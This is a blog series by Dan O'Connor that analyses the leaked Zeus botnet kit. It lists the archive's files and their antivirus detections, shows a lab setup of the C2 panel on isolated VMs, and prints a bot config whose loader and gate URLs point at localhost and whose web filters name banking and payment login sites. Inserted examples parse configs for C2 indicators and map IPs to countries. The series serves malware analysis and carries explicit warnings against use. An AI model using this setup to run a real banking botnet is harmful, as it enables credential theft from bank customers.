June 11, 2011 11:20 PM
Posted by: Dan O'Connor
zeus analysis,
zeus botnet,
zeus source code,
zeus walkthrough

Having built the bot, it's worth looking at what the basic config file looks like.
entry "StaticConfig"
;botnet "btn1"
timer_config 60 1
timer_logs 1 1
timer_stats 20 1
url_config "http://localhost/config.bin"
remove_certs 1
disable_tcpserver 0
encryption_key "secret key"
end
entry "DynamicConfig"
url_loader "http://localhost/bot.exe"
url_server "http://localhost/gate.php"
file_webinjects "webinjects.txt"
entry "AdvancedConfigs"
;"http://advdomain/cfg1.bin"
end
entry "WebFilters"
"!*.microsoft.com/*"
"!http://*myspace.com*"
"https://www.gruposantander.es/*"
"!http://*odnoklassniki.ru/*"
"!http://vkontakte.ru/*"
"@*/login.osmp.ru/*"
"@*/atl.osmp.ru/*"
end
entry "WebDataFilters"
;"http://mail.rambler.ru/*" "passw;login"
end
entry "WebFakes"
;"http://www.google.com" "http://www.yahoo.com" "GP" "" ""
end
end
At this point we know what the encryption key, url_config, url_loader and url_server are. The rest will have to be traced back in the source code when we get there.
I am very interested in the WebFakes listing.
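As an added example (not code from the post or from the Zeus source), here is a small Python parser for this config.txt format that pulls out what a defender wants from a recovered config: the C2 URLs and hostnames for blocklists or DNS hunting, and the WebFilters masks. The block grammar it assumes (entry/end, ';' comments, bare quoted lines as list items, anything else as key followed by values) is inferred from the config above rather than documented in the post, and the sample embedded in the code is a trimmed copy of that config. The post does not explain the leading '!' and '@' on the WebFilters masks, so the parser separates that prefix but does not interpret it.

```python
"""Parse a decrypted Zeus config.txt and pull out the network indicators.

Added example, not code from the post or the Zeus source. The format rules
below are assumptions inferred from the config shown in the post.
"""
import shlex
from urllib.parse import urlparse

# Constructed sample: a trimmed copy of the config.txt shown in the post.
SAMPLE_CONFIG = r'''
entry "StaticConfig"
;botnet "btn1"
timer_config 60 1
timer_logs 1 1
timer_stats 20 1
url_config "http://localhost/config.bin"
remove_certs 1
disable_tcpserver 0
encryption_key "secret key"
end
entry "DynamicConfig"
url_loader "http://localhost/bot.exe"
url_server "http://localhost/gate.php"
file_webinjects "webinjects.txt"
entry "AdvancedConfigs"
;"http://advdomain/cfg1.bin"
end
entry "WebFilters"
"!*.microsoft.com/*"
"https://www.gruposantander.es/*"
"!http://vkontakte.ru/*"
"@*/login.osmp.ru/*"
end
entry "WebFakes"
;"http://www.google.com" "http://www.yahoo.com" "GP" "" ""
end
end
'''

URL_KEYS = ("url_config", "url_loader", "url_server")


def parse_config(text):
    """Return nested dicts: key -> list of values, sub-entry -> dict, and bare
    quoted lines collected under the reserved key '_items'."""
    root = {}
    stack = [root]
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):      # blank line or comment
            continue
        if line == "end":
            if len(stack) == 1:
                raise ValueError("'end' without a matching 'entry'")
            stack.pop()
            continue
        toks = shlex.split(line)                  # honours the "..." quoting
        if toks[0] == "entry" and len(toks) == 2:
            block = {}
            stack[-1][toks[1]] = block
            stack.append(block)
        elif line.startswith('"'):                # bare item, e.g. a URL mask
            stack[-1].setdefault("_items", []).append(toks)
        else:                                     # key followed by its values
            stack[-1][toks[0]] = toks[1:]
    if len(stack) != 1:
        raise ValueError("%d entry block(s) never closed" % (len(stack) - 1))
    return root


def extract_urls(cfg):
    """(setting, url) for url_config/url_loader/url_server anywhere in the
    tree, plus every backup config URL listed under AdvancedConfigs."""
    found = set()

    def walk(block):
        for key, val in block.items():
            if isinstance(val, dict):
                if key == "AdvancedConfigs":
                    for item in val.get("_items", []):
                        found.update(("AdvancedConfigs", u) for u in item)
                walk(val)
            elif key in URL_KEYS and val:
                found.add((key, val[0]))

    walk(cfg)
    return sorted(found)


def c2_hosts(cfg):
    """Distinct hostnames the bot would contact, ready for a blocklist."""
    return sorted({urlparse(u).hostname for _, u in extract_urls(cfg)})


def web_filters(cfg):
    """(flag, mask) per WebFilters line; the '!' / '@' prefix is split off
    but not interpreted, since the post does not document its meaning."""
    block = cfg.get("DynamicConfig", {}).get("WebFilters", {})
    out = []
    for item in block.get("_items", []):
        mask = item[0]
        flag = mask[0] if mask[:1] in ("!", "@") else ""
        out.append((flag, mask[len(flag):]))
    return out


if __name__ == "__main__":
    print(c2_hosts(parse_config(SAMPLE_CONFIG)))
```

Point parse_config at a config recovered from a sample and the three helpers give you the C2 URLs, the hostnames and the URL masks in one pass; an unbalanced entry/end structure raises ValueError rather than silently producing a partial tree.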
May 29, 2011 1:26 AM
Posted by: Dan O'Connor
pbs,
pbs video,
wikileaks

It does not matter what your opinion is, you just need to watch this.
http://video.pbs.org/video/1946795242
May 29, 2011 12:47 AM
Posted by: Dan O'Connor
zeus analysis,
zeus botnet,
zeus source code,
zeus walkthrough

Next we need to build our bot and configure it.
This is the zsb.exe file; point it at the config.txt. The IP address of the server will need to be set, and the key configured.
For bonus points, you can use zsb.exe to check whether the host you are running it on is infected, but you will need to know its key.
Time for some clickity click.

To call this easy is insulting; a monkey can set this up.
So, DON’T DO IT.
This will get you in lots of trouble if you try to use it.
But it’s very educational and fun for our purposes.
JUST DON’T USE IT.
May 29, 2011 12:15 AM
Posted by: Dan O'Connor
zeus analysis,
zeus botnet,
zeus source code,
zeus walkthrough

If all has gone well you should be able to get the install screen.
We need to set up the admin user and password, and provide login details for the SQL database. The encryption key also needs to be set at this point.
Hit install and time for more beer!
Here is the completed install screen.

Now we can login to the control panel and start to have some fun!

I can say that I am impressed with the interface: simple and very effective.
Part 4 will be the infection of the first host.
May 28, 2011 12:44 AM
Posted by: Dan O'Connor
zeus analysis,
zeus botnet,
zeus source code,
zeus walkthrough

If you are following at home you are going to need to install some webby stuff on your "server".
I am going to use XAMPP.
Also your machines are going to need to be able to talk, so make sure you are all set up. Using VMware I set up a network on which only the server and the machine called "infect" can talk to each other.
I will not go into the setup of XAMPP; just remember to configure your Apache and any needed security settings to run PHP.
At this point you should be able to connect to your new web server and we can now start installing the C2.
May 25, 2011 10:25 PM
Posted by: Dan O'Connor
zeus analysis,
zeus botnet,
zeus source code,
zeus walkthrough

I am going to step through the Zeus bot source code. I will start with the PHP stuff, which should be pretty light. There are about 44 PHP files to go over.
> find . -type f -name "*.php"
./cp.php
./gate.php
./index.php
./install/index.php
./system/botnet_bots.lng.en.php
./system/botnet_bots.lng.ru.php
./system/botnet_bots.php
./system/botnet_scripts.lng.en.php
./system/botnet_scripts.lng.ru.php
./system/botnet_scripts.php
./system/fsarc.php
./system/global.php
./system/index.php
./system/jabberclass.php
./system/lng.en.php
./system/lng.ru.php
./system/reports_db.lng.en.php
./system/reports_db.lng.ru.php
./system/reports_db.php
./system/reports_files.lng.en.php
./system/reports_files.lng.ru.php
./system/reports_files.php
./system/reports_jn.lng.en.php
./system/reports_jn.lng.ru.php
./system/reports_jn.php
./system/stats_main.lng.en.php
./system/stats_main.lng.ru.php
./system/stats_main.php
./system/stats_os.lng.en.php
./system/stats_os.lng.ru.php
./system/stats_os.php
./system/sys_info.lng.en.php
./system/sys_info.lng.ru.php
./system/sys_info.php
./system/sys_options.lng.en.php
./system/sys_options.lng.ru.php
./system/sys_options.php
./system/sys_user.lng.en.php
./system/sys_user.lng.ru.php
./system/sys_user.php
./system/sys_users.lng.en.php
./system/sys_users.lng.ru.php
./system/sys_users.php
./theme/index.php
Then we have a whole whack of C to go through.
Also if you are following at home you may need to install the Russian lang pack for your OS.
First thing we need to do is install this stuff, and we will start to get an idea of what does what.
May 24, 2011 10:02 PM
Posted by: Dan O'Connor
zeus bot net,
zeus rar

So what was in the Zeus rar?
7z.exe – Looks clean, nothing reported on it.
bt.exe – Listed as suspicious but nothing specific by any vendor.
upx.exe – Nothing reported.
FASM.exe – Listed as suspicious but nothing specific by any vendor.
php.exe – Nothing reported.
zip.exe – Nothing reported.
zsb.exe – Reported as Trojan-Spy:W32/Zbot, everything reports this as the main exe for the Zeus botnet.
zsbcs.exe – Backdoor, Backdoor.Generic.653241
Lots of PHP, cpp, xml, a few txt and a GeoIP lookup csv.
If you do not know what that is, it's a list of IP ranges with the assigned country code. This list can be purchased online and is frequently updated.
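As an added example (not code from the post or the archive), here is how such a range list is used for a lookup: the rows are sorted by start address and a binary search over the starts finds the candidate range, which is then checked against its end. The column layout assumed below (start IP, end IP, the same two as integers, ISO code, country name) and the three sample rows are constructed for this example, not taken from the CSV in the archive; an analyst would use it to tag the C2 addresses from a config with a country for a report.

```python
"""Country lookup over a GeoIP-style IP range CSV.

Added example, not code from the post or the Zeus archive. The column
layout is an assumption about what the file looks like.
"""
import bisect
import csv
import io
import ipaddress

# Constructed sample rows, not data from the archive:
# start IP, end IP, start as integer, end as integer, ISO code, country name.
SAMPLE_GEOIP_CSV = '''"1.0.0.0","1.0.0.255","16777216","16777471","AU","Australia"
"1.0.1.0","1.0.3.255","16777472","16778239","CN","China"
"8.8.8.0","8.8.8.255","134744064","134744319","US","United States"
'''


class GeoIpTable:
    """Ranges sorted by start address; lookup is a binary search on the starts."""

    def __init__(self, csv_text):
        rows = []
        for start, end, _s, _e, code, name in csv.reader(io.StringIO(csv_text)):
            lo = int(ipaddress.IPv4Address(start))   # parse the dotted form
            hi = int(ipaddress.IPv4Address(end))     # rather than trust the integer columns
            if hi < lo:
                raise ValueError("range %s-%s is reversed" % (start, end))
            rows.append((lo, hi, code, name))
        rows.sort()
        self.rows = rows
        self.starts = [r[0] for r in rows]

    def lookup(self, ip):
        """Return the ISO country code, or None if no range covers the address."""
        n = int(ipaddress.IPv4Address(ip))
        i = bisect.bisect_right(self.starts, n) - 1   # last range starting at or before n
        if i >= 0 and self.rows[i][0] <= n <= self.rows[i][1]:
            return self.rows[i][2]
        return None                                   # falls in a gap between ranges

    def tag(self, ips):
        """Annotate a list of indicator IPs with their country for a report."""
        return [(ip, self.lookup(ip) or "??") for ip in ips]


if __name__ == "__main__":
    table = GeoIpTable(SAMPLE_GEOIP_CSV)
    for ip, code in table.tag(["1.0.2.7", "8.8.8.8", "10.1.2.3"]):
        print(ip, code)
```

Gaps between ranges are real in these lists, so lookup returns None rather than the nearest neighbour; tag turns that into a visible "??" instead of silently mis-attributing an address.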
More to come.